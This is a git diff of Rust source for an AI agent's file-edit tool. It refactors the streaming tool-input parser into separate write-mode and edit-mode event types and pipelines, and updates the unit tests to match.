+++ 
b/crates/agent/src/tools/edit_file_tool.rs @@ -1,13 +1,14 @@ mod reindent; mod streaming_fuzzy_matcher; +mod streaming_parser; use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; use super::save_file_tool::SaveFileTool; -use super::tool_edit_parser::{ToolEditEvent, ToolEditParser}; use crate::ToolInputPayload; use crate::tools::edit_file_tool::{ reindent::{Reindenter, compute_indent_delta}, streaming_fuzzy_matcher::StreamingFuzzyMatcher, + streaming_parser::{EditEvent, StreamingParser, WriteEvent}, }; use crate::{AgentTool, Thread, ToolCallEventStream, ToolInput}; use acp_thread::Diff; @@ -598,16 +599,23 @@ pub struct EditSession { buffer: Entity, old_text: Arc, diff: Entity, - mode: EditFileMode, - parser: ToolEditParser, - pipeline: EditPipeline, - file_changed_since_last_read: bool, + parser: StreamingParser, + pipeline: Pipeline, _finalize_diff_guard: Deferred>, } +enum Pipeline { + Write(WritePipeline), + Edit(EditPipeline), +} + +struct WritePipeline { + content_written: bool, +} + struct EditPipeline { current_edit: Option, - content_written: bool, + file_changed_since_last_read: bool, } enum EditPipelineEntry { @@ -622,14 +630,51 @@ enum EditPipelineEntry { }, } -impl EditPipeline { - fn new() -> Self { - Self { - current_edit: None, - content_written: false, +impl Pipeline { + fn new(mode: EditFileMode, file_changed_since_last_read: bool) -> Self { + match mode { + EditFileMode::Write => Self::Write(WritePipeline { + content_written: false, + }), + EditFileMode::Edit => Self::Edit(EditPipeline { + current_edit: None, + file_changed_since_last_read, + }), } } +} + +impl WritePipeline { + fn process_event( + &mut self, + event: &WriteEvent, + buffer: &Entity, + tool: &EditFileTool, + cx: &mut AsyncApp, + ) { + let WriteEvent::ContentChunk { chunk } = event; + + let (buffer_id, buffer_len) = + buffer.read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); + let edit_range = if self.content_written { + buffer_len..buffer_len + } else { + 
0..buffer_len + }; + + agent_edit_buffer(buffer, [(edit_range, chunk.as_str())], &tool.action_log, cx); + cx.update(|cx| { + tool.set_agent_location( + buffer.downgrade(), + text::Anchor::max_for_buffer(buffer_id), + cx, + ); + }); + self.content_written = true; + } +} +impl EditPipeline { fn ensure_resolving_old_text(&mut self, buffer: &Entity, cx: &mut AsyncApp) { if self.current_edit.is_none() { let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); @@ -638,6 +683,199 @@ impl EditPipeline { }); } } + + fn process_event( + &mut self, + event: &EditEvent, + buffer: &Entity, + diff: &Entity, + abs_path: &PathBuf, + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match event { + EditEvent::OldTextChunk { + chunk, done: false, .. + } => { + log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); + self.ensure_resolving_old_text(buffer, cx); + + if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.current_edit + && !chunk.is_empty() + { + if let Some(match_range) = matcher.push(chunk, None) { + let anchor_range = buffer.read_with(cx, |buffer, _cx| { + buffer.anchor_range_outside(match_range.clone()) + }); + diff.update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + cx.update(|cx| { + let position = buffer.read(cx).anchor_before(match_range.end); + tool.set_agent_location(buffer.downgrade(), position, cx); + }); + } + } + } + EditEvent::OldTextChunk { + edit_index, + chunk, + done: true, + } => { + log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); + + self.ensure_resolving_old_text(buffer, cx); + + let Some(EditPipelineEntry::ResolvingOldText { matcher }) = &mut self.current_edit + else { + return Ok(()); + }; + + if !chunk.is_empty() { + matcher.push(chunk, None); + } + let range = extract_match( + matcher.finish(), + buffer, + edit_index, + self.file_changed_since_last_read, + cx, + )?; + + let anchor_range = + buffer.read_with(cx, 
|buffer, _cx| buffer.anchor_range_outside(range.clone())); + diff.update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + + let line = snapshot.offset_to_point(range.start).row; + event_stream.update_fields( + ToolCallUpdateFields::new() + .locations(vec![ToolCallLocation::new(abs_path).line(Some(line))]), + ); + + let buffer_indent = snapshot.line_indent_for_row(line); + let query_indent = text::LineIndent::from_iter( + matcher + .query_lines() + .first() + .map(|s| s.as_str()) + .unwrap_or("") + .chars(), + ); + let indent_delta = compute_indent_delta(buffer_indent, query_indent); + + let old_text_in_buffer = snapshot.text_for_range(range.clone()).collect::(); + + log::debug!( + "edit[{}] old_text matched at {}..{}: {:?}", + edit_index, + range.start, + range.end, + old_text_in_buffer, + ); + + let text_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.current_edit = Some(EditPipelineEntry::StreamingNewText { + streaming_diff: StreamingDiff::new(old_text_in_buffer), + edit_cursor: range.start, + reindenter: Reindenter::new(indent_delta), + original_snapshot: text_snapshot, + }); + + cx.update(|cx| { + let position = buffer.read(cx).anchor_before(range.end); + tool.set_agent_location(buffer.downgrade(), position, cx); + }); + } + EditEvent::NewTextChunk { + chunk, done: false, .. + } => { + log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + streaming_diff, + edit_cursor, + reindenter, + original_snapshot, + .. 
+ }) = &mut self.current_edit + else { + return Ok(()); + }; + + let reindented = reindenter.push(chunk); + if reindented.is_empty() { + return Ok(()); + } + + let char_ops = streaming_diff.push_new(&reindented); + apply_char_operations( + &char_ops, + buffer, + original_snapshot, + edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(*edit_cursor); + cx.update(|cx| { + tool.set_agent_location(buffer.downgrade(), position, cx); + }); + } + EditEvent::NewTextChunk { + chunk, done: true, .. + } => { + log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + mut streaming_diff, + mut edit_cursor, + mut reindenter, + original_snapshot, + }) = self.current_edit.take() + else { + return Ok(()); + }; + + // Flush any remaining reindent buffer + final chunk. + let mut final_text = reindenter.push(chunk); + final_text.push_str(&reindenter.finish()); + + log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); + + if !final_text.is_empty() { + let char_ops = streaming_diff.push_new(&final_text); + apply_char_operations( + &char_ops, + buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + } + + let remaining_ops = streaming_diff.finish(); + apply_char_operations( + &remaining_ops, + buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(edit_cursor); + cx.update(|cx| { + tool.set_agent_location(buffer.downgrade(), position, cx); + }); + } + } + Ok(()) + } } impl EditSession { @@ -704,10 +942,8 @@ impl EditSession { buffer, old_text, diff, - mode, - parser: ToolEditParser::default(), - pipeline: EditPipeline::new(), - file_changed_since_last_read, + parser: StreamingParser::default(), + pipeline: Pipeline::new(mode, file_changed_since_last_read), _finalize_diff_guard: finalize_diff_guard, }) } @@ -719,21 +955,39 @@ impl EditSession { event_stream: 
&ToolCallEventStream, cx: &mut AsyncApp, ) -> Result<(), String> { - match input.mode { - EditFileMode::Write => { + let Self { + abs_path, + buffer, + diff, + parser, + pipeline, + .. + } = self; + match pipeline { + Pipeline::Write(write) => { let content = input .content .ok_or_else(|| "'content' field is required for write mode".to_string())?; - let events = self.parser.finalize_content(&content); - self.process_events(&events, tool, event_stream, cx)?; + for event in &parser.finalize_content(&content) { + write.process_event(event, buffer, tool, cx); + } } - EditFileMode::Edit => { + Pipeline::Edit(edit_pipeline) => { let edits = input .edits .ok_or_else(|| "'edits' field is required for edit mode".to_string())?; - let events = self.parser.finalize_edits(&edits); - self.process_events(&events, tool, event_stream, cx)?; + for event in &parser.finalize_edits(&edits) { + edit_pipeline.process_event( + event, + buffer, + diff, + abs_path, + tool, + event_stream, + cx, + )?; + } if log::log_enabled!(log::Level::Debug) { log::debug!("Got edits:"); @@ -773,246 +1027,35 @@ impl EditSession { event_stream: &ToolCallEventStream, cx: &mut AsyncApp, ) -> Result<(), String> { - match &self.mode { - EditFileMode::Write => { + let Self { + abs_path, + buffer, + diff, + parser, + pipeline, + .. 
+ } = self; + match pipeline { + Pipeline::Write(write) => { if let Some(content) = &partial.content { - let events = self.parser.push_content(content); - self.process_events(&events, tool, event_stream, cx)?; + for event in &parser.push_content(content) { + write.process_event(event, buffer, tool, cx); + } } } - EditFileMode::Edit => { + Pipeline::Edit(edit_pipeline) => { if let Some(edits) = partial.edits { - let events = self.parser.push_edits(&edits); - self.process_events(&events, tool, event_stream, cx)?; - } - } - } - Ok(()) - } - - fn process_events( - &mut self, - events: &[ToolEditEvent], - tool: &EditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), String> { - for event in events { - match event { - ToolEditEvent::ContentChunk { chunk } => { - let (buffer_id, buffer_len) = self - .buffer - .read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); - let edit_range = if self.pipeline.content_written { - buffer_len..buffer_len - } else { - 0..buffer_len - }; - - agent_edit_buffer( - &self.buffer, - [(edit_range, chunk.as_str())], - &tool.action_log, - cx, - ); - cx.update(|cx| { - tool.set_agent_location( - self.buffer.downgrade(), - text::Anchor::max_for_buffer(buffer_id), - cx, - ); - }); - self.pipeline.content_written = true; - } - - ToolEditEvent::OldTextChunk { - chunk, done: false, .. 
- } => { - log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); - self.pipeline.ensure_resolving_old_text(&self.buffer, cx); - - if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = - &mut self.pipeline.current_edit - && !chunk.is_empty() - { - if let Some(match_range) = matcher.push(chunk, None) { - let anchor_range = self.buffer.read_with(cx, |buffer, _cx| { - buffer.anchor_range_outside(match_range.clone()) - }); - self.diff - .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - - cx.update(|cx| { - let position = self.buffer.read(cx).anchor_before(match_range.end); - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - } - } - - ToolEditEvent::OldTextChunk { - edit_index, - chunk, - done: true, - } => { - log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); - - self.pipeline.ensure_resolving_old_text(&self.buffer, cx); - - let Some(EditPipelineEntry::ResolvingOldText { matcher }) = - &mut self.pipeline.current_edit - else { - continue; - }; - - if !chunk.is_empty() { - matcher.push(chunk, None); - } - let range = extract_match( - matcher.finish(), - &self.buffer, - edit_index, - self.file_changed_since_last_read, - cx, - )?; - - let anchor_range = self - .buffer - .read_with(cx, |buffer, _cx| buffer.anchor_range_outside(range.clone())); - self.diff - .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - - let snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - - let line = snapshot.offset_to_point(range.start).row; - event_stream.update_fields( - ToolCallUpdateFields::new().locations(vec![ - ToolCallLocation::new(&self.abs_path).line(Some(line)), - ]), - ); - - let buffer_indent = snapshot.line_indent_for_row(line); - let query_indent = text::LineIndent::from_iter( - matcher - .query_lines() - .first() - .map(|s| s.as_str()) - .unwrap_or("") - .chars(), - ); - let indent_delta = compute_indent_delta(buffer_indent, query_indent); - - let old_text_in_buffer = - 
snapshot.text_for_range(range.clone()).collect::(); - - log::debug!( - "edit[{}] old_text matched at {}..{}: {:?}", - edit_index, - range.start, - range.end, - old_text_in_buffer, - ); - - let text_snapshot = self - .buffer - .read_with(cx, |buffer, _cx| buffer.text_snapshot()); - self.pipeline.current_edit = Some(EditPipelineEntry::StreamingNewText { - streaming_diff: StreamingDiff::new(old_text_in_buffer), - edit_cursor: range.start, - reindenter: Reindenter::new(indent_delta), - original_snapshot: text_snapshot, - }); - - cx.update(|cx| { - let position = self.buffer.read(cx).anchor_before(range.end); - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - - ToolEditEvent::NewTextChunk { - chunk, done: false, .. - } => { - log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); - - let Some(EditPipelineEntry::StreamingNewText { - streaming_diff, - edit_cursor, - reindenter, - original_snapshot, - .. - }) = &mut self.pipeline.current_edit - else { - continue; - }; - - let reindented = reindenter.push(chunk); - if reindented.is_empty() { - continue; - } - - let char_ops = streaming_diff.push_new(&reindented); - apply_char_operations( - &char_ops, - &self.buffer, - original_snapshot, - edit_cursor, - &tool.action_log, - cx, - ); - - let position = original_snapshot.anchor_before(*edit_cursor); - cx.update(|cx| { - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - - ToolEditEvent::NewTextChunk { - chunk, done: true, .. - } => { - log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); - - let Some(EditPipelineEntry::StreamingNewText { - mut streaming_diff, - mut edit_cursor, - mut reindenter, - original_snapshot, - }) = self.pipeline.current_edit.take() - else { - continue; - }; - - // Flush any remaining reindent buffer + final chunk. 
- let mut final_text = reindenter.push(chunk); - final_text.push_str(&reindenter.finish()); - - log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); - - if !final_text.is_empty() { - let char_ops = streaming_diff.push_new(&final_text); - apply_char_operations( - &char_ops, - &self.buffer, - &original_snapshot, - &mut edit_cursor, - &tool.action_log, + for event in &parser.push_edits(&edits) { + edit_pipeline.process_event( + event, + buffer, + diff, + abs_path, + tool, + event_stream, cx, - ); + )?; } - - let remaining_ops = streaming_diff.finish(); - apply_char_operations( - &remaining_ops, - &self.buffer, - &original_snapshot, - &mut edit_cursor, - &tool.action_log, - cx, - ); - - let position = original_snapshot.anchor_before(edit_cursor); - cx.update(|cx| { - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); } } } diff --git a/crates/agent/src/tools/tool_edit_parser.rs b/crates/agent/src/tools/edit_file_tool/streaming_parser.rs similarity index 86% rename from crates/agent/src/tools/tool_edit_parser.rs rename to crates/agent/src/tools/edit_file_tool/streaming_parser.rs index 86f249ff34eb13..6a44959a141c80 100644 --- a/crates/agent/src/tools/tool_edit_parser.rs +++ b/crates/agent/src/tools/edit_file_tool/streaming_parser.rs @@ -2,9 +2,9 @@ use smallvec::SmallVec; use crate::{Edit, PartialEdit}; -/// Events emitted by `ToolEditParser` as tool call input streams in. +/// Events emitted by `StreamingParser` for edit-mode input. #[derive(Debug, PartialEq, Eq)] -pub enum ToolEditEvent { +pub enum EditEvent { /// A chunk of `old_text` for an edit operation. OldTextChunk { edit_index: usize, @@ -17,6 +17,11 @@ pub enum ToolEditEvent { chunk: String, done: bool, }, +} + +/// Events emitted by `StreamingParser` for write-mode input. +#[derive(Debug, PartialEq, Eq)] +pub enum WriteEvent { /// A chunk of content for write/overwrite mode. 
ContentChunk { chunk: String }, } @@ -34,9 +39,9 @@ struct EditStreamState { /// /// The tool call streaming infrastructure delivers partial JSON objects where /// string fields grow over time. This parser compares consecutive partials, -/// computes the deltas, and emits `ToolEditEvent`s that downstream pipeline -/// stages (`StreamingFuzzyMatcher` for old_text, `StreamingDiff` for new_text) -/// can consume incrementally. +/// computes the deltas, and emits `EditEvent`s or `WriteEvent`s that downstream +/// pipeline stages (`StreamingFuzzyMatcher` for old_text, `StreamingDiff` for +/// new_text) can consume incrementally. /// /// Because partial JSON comes through a fixer (`partial-json-fixer`) that /// closes incomplete escape sequences, a string can temporarily contain wrong @@ -46,18 +51,18 @@ struct EditStreamState { /// next partial confirms or corrects it. This avoids feeding corrupted bytes /// to downstream consumers. #[derive(Default, Debug)] -pub struct ToolEditParser { +pub struct StreamingParser { edit_states: Vec, content_emitted_len: usize, } -impl ToolEditParser { +impl StreamingParser { /// Push a new set of partial edits (from edit mode) and return any events. /// /// Each call should pass the *entire current* edits array as seen in the /// latest partial input. The parser will diff it against its internal state /// to produce only the new events. 
- pub fn push_edits(&mut self, edits: &[PartialEdit]) -> SmallVec<[ToolEditEvent; 4]> { + pub fn push_edits(&mut self, edits: &[PartialEdit]) -> SmallVec<[EditEvent; 4]> { let mut events = SmallVec::new(); for (index, partial) in edits.iter().enumerate() { @@ -81,7 +86,7 @@ impl ToolEditParser { let chunk = normalize_done_chunk(old_text[start..].to_string()); state.old_text_done = true; state.old_text_emitted_len = old_text.len(); - events.push(ToolEditEvent::OldTextChunk { + events.push(EditEvent::OldTextChunk { edit_index: index, chunk, done: true, @@ -92,7 +97,7 @@ impl ToolEditParser { if safe_end > state.old_text_emitted_len { let chunk = old_text[state.old_text_emitted_len..safe_end].to_string(); state.old_text_emitted_len = safe_end; - events.push(ToolEditEvent::OldTextChunk { + events.push(EditEvent::OldTextChunk { edit_index: index, chunk, done: false, @@ -110,7 +115,7 @@ impl ToolEditParser { if safe_end > state.new_text_emitted_len { let chunk = new_text[state.new_text_emitted_len..safe_end].to_string(); state.new_text_emitted_len = safe_end; - events.push(ToolEditEvent::NewTextChunk { + events.push(EditEvent::NewTextChunk { edit_index: index, chunk, done: false, @@ -126,14 +131,14 @@ impl ToolEditParser { /// /// Each call should pass the *entire current* content string. The parser /// will diff it against its internal state to emit only the new chunk. - pub fn push_content(&mut self, content: &str) -> SmallVec<[ToolEditEvent; 1]> { + pub fn push_content(&mut self, content: &str) -> SmallVec<[WriteEvent; 1]> { let mut events = SmallVec::new(); let safe_end = safe_emit_end(content); if safe_end > self.content_emitted_len { let chunk = content[self.content_emitted_len..safe_end].to_string(); self.content_emitted_len = safe_end; - events.push(ToolEditEvent::ContentChunk { chunk }); + events.push(WriteEvent::ContentChunk { chunk }); } events @@ -146,7 +151,7 @@ impl ToolEditParser { /// `final_edits` should be the fully deserialized final edits array. 
The /// parser compares against its tracked state and emits any remaining deltas /// with `done: true`. - pub fn finalize_edits(&mut self, edits: &[Edit]) -> SmallVec<[ToolEditEvent; 4]> { + pub fn finalize_edits(&mut self, edits: &[Edit]) -> SmallVec<[EditEvent; 4]> { let mut events = SmallVec::new(); for (index, edit) in edits.iter().enumerate() { @@ -165,7 +170,7 @@ impl ToolEditParser { let chunk = normalize_done_chunk(edit.old_text[start..].to_string()); state.old_text_done = true; state.old_text_emitted_len = edit.old_text.len(); - events.push(ToolEditEvent::OldTextChunk { + events.push(EditEvent::OldTextChunk { edit_index: index, chunk, done: true, @@ -177,7 +182,7 @@ impl ToolEditParser { let chunk = normalize_done_chunk(edit.new_text[start..].to_string()); state.new_text_done = true; state.new_text_emitted_len = edit.new_text.len(); - events.push(ToolEditEvent::NewTextChunk { + events.push(EditEvent::NewTextChunk { edit_index: index, chunk, done: true, @@ -189,14 +194,14 @@ impl ToolEditParser { } /// Finalize content with the complete input. - pub fn finalize_content(&mut self, content: &str) -> SmallVec<[ToolEditEvent; 1]> { + pub fn finalize_content(&mut self, content: &str) -> SmallVec<[WriteEvent; 1]> { let mut events = SmallVec::new(); let start = self.content_emitted_len.min(content.len()); if content.len() > start { let chunk = content[start..].to_string(); self.content_emitted_len = content.len(); - events.push(ToolEditEvent::ContentChunk { chunk }); + events.push(WriteEvent::ContentChunk { chunk }); } events @@ -204,7 +209,7 @@ impl ToolEditParser { /// When a new edit appears at `index`, finalize the edit at `index - 1` /// by emitting a `NewTextChunk { done: true }` if it hasn't been finalized. 
- fn finalize_previous_edit(&mut self, new_index: usize) -> Option> { + fn finalize_previous_edit(&mut self, new_index: usize) -> Option> { if new_index == 0 || self.edit_states.is_empty() { return None; } @@ -220,7 +225,7 @@ impl ToolEditParser { // If old_text was never finalized, finalize it now with an empty done chunk. if !state.old_text_done { state.old_text_done = true; - events.push(ToolEditEvent::OldTextChunk { + events.push(EditEvent::OldTextChunk { edit_index: previous_index, chunk: String::new(), done: true, @@ -230,7 +235,7 @@ impl ToolEditParser { // Emit a done event for new_text if not already finalized. if !state.new_text_done { state.new_text_done = true; - events.push(ToolEditEvent::NewTextChunk { + events.push(EditEvent::NewTextChunk { edit_index: previous_index, chunk: String::new(), done: true, @@ -276,7 +281,7 @@ mod tests { #[test] fn test_single_edit_streamed_incrementally() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // old_text arrives in chunks: "hell" → "hello w" → "hello world" let events = parser.push_edits(&[PartialEdit { @@ -285,7 +290,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "hell".into(), done: false, @@ -298,7 +303,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "o w".into(), done: false, @@ -313,12 +318,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "orld".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "good".into(), done: false, @@ -333,7 +338,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: "bye world".into(), done: false, @@ -347,7 +352,7 @@ mod tests { }]); 
assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: "".into(), done: true, @@ -357,7 +362,7 @@ mod tests { #[test] fn test_done_chunks_strip_trailing_newline() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.finalize_edits(&[Edit { old_text: "before\n".into(), @@ -366,12 +371,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "before".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "after".into(), done: true, @@ -382,7 +387,7 @@ mod tests { #[test] fn test_partial_edit_chunks_hold_back_trailing_newline() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_edits(&[PartialEdit { old_text: Some("before\n".into()), @@ -391,12 +396,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "before".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "after".into(), done: false, @@ -410,7 +415,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: "".into(), done: true, @@ -420,7 +425,7 @@ mod tests { #[test] fn test_multiple_edits_sequential() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // First edit streams in let events = parser.push_edits(&[PartialEdit { @@ -429,7 +434,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "first old".into(), done: false, @@ -443,12 +448,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 
0, chunk: "".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "first new".into(), done: false, @@ -470,12 +475,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "".into(), done: true, }, - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 1, chunk: "second".into(), done: false, @@ -497,12 +502,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 1, chunk: " old".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 1, chunk: "second new".into(), done: true, @@ -513,12 +518,12 @@ mod tests { #[test] fn test_content_streamed_incrementally() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_content("hello"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: "hello".into(), }] ); @@ -526,7 +531,7 @@ mod tests { let events = parser.push_content("hello world"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: " world".into(), }] ); @@ -538,7 +543,7 @@ mod tests { let events = parser.push_content("hello world!"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { chunk: "!".into() }] + &[WriteEvent::ContentChunk { chunk: "!".into() }] ); // Finalize with no additional content @@ -548,13 +553,13 @@ mod tests { #[test] fn test_finalize_content_with_remaining() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); parser.push_content("partial"); let events = parser.finalize_content("partial content here"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: " content here".into(), }] ); @@ -562,14 +567,14 @@ mod tests { #[test] fn 
test_content_trailing_backslash_held_back() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Partial JSON fixer turns incomplete \n into \\ (literal backslash). // The trailing backslash is held back. let events = parser.push_content("hello,\\"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: "hello,".into(), }] ); @@ -579,14 +584,14 @@ mod tests { let events = parser.push_content("hello,\n"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { chunk: "\n".into() }] + &[WriteEvent::ContentChunk { chunk: "\n".into() }] ); // Normal growth. let events = parser.push_content("hello,\nworld"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: "world".into(), }] ); @@ -594,7 +599,7 @@ mod tests { #[test] fn test_content_finalize_with_trailing_backslash() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Stream a partial with a fixer-corrupted trailing backslash. // The backslash is held back. 
@@ -604,13 +609,13 @@ mod tests { let events = parser.finalize_content("abc\n"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { chunk: "\n".into() }] + &[WriteEvent::ContentChunk { chunk: "\n".into() }] ); } #[test] fn test_no_partials_direct_finalize() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.finalize_edits(&[Edit { old_text: "old".into(), @@ -619,12 +624,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "old".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "new".into(), done: true, @@ -635,7 +640,7 @@ mod tests { #[test] fn test_no_partials_direct_finalize_multiple() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.finalize_edits(&[ Edit { @@ -650,22 +655,22 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "first old".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "first new".into(), done: true, }, - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 1, chunk: "second old".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 1, chunk: "second new".into(), done: true, @@ -676,7 +681,7 @@ mod tests { #[test] fn test_old_text_no_growth() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_edits(&[PartialEdit { old_text: Some("same".into()), @@ -684,7 +689,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "same".into(), done: false, @@ -701,7 +706,7 @@ mod tests { #[test] fn test_old_text_none_then_appears() { - let mut 
parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Edit exists but old_text is None (field hasn't arrived yet) let events = parser.push_edits(&[PartialEdit { @@ -717,7 +722,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "text".into(), done: false, @@ -727,7 +732,7 @@ mod tests { #[test] fn test_empty_old_text_with_new_text() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // old_text is empty, new_text appears immediately let events = parser.push_edits(&[PartialEdit { @@ -737,12 +742,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "inserted".into(), done: false, @@ -753,7 +758,7 @@ mod tests { #[test] fn test_three_edits_streamed() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Stream first edit parser.push_edits(&[PartialEdit { @@ -793,12 +798,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 1, chunk: "".into(), done: true, }, - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 2, chunk: "c".into(), done: false, @@ -824,12 +829,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 2, chunk: "".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 2, chunk: "C".into(), done: true, @@ -840,7 +845,7 @@ mod tests { #[test] fn test_finalize_with_unseen_old_text() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Only saw partial old_text, never saw new_text in partials parser.push_edits(&[PartialEdit { @@ 
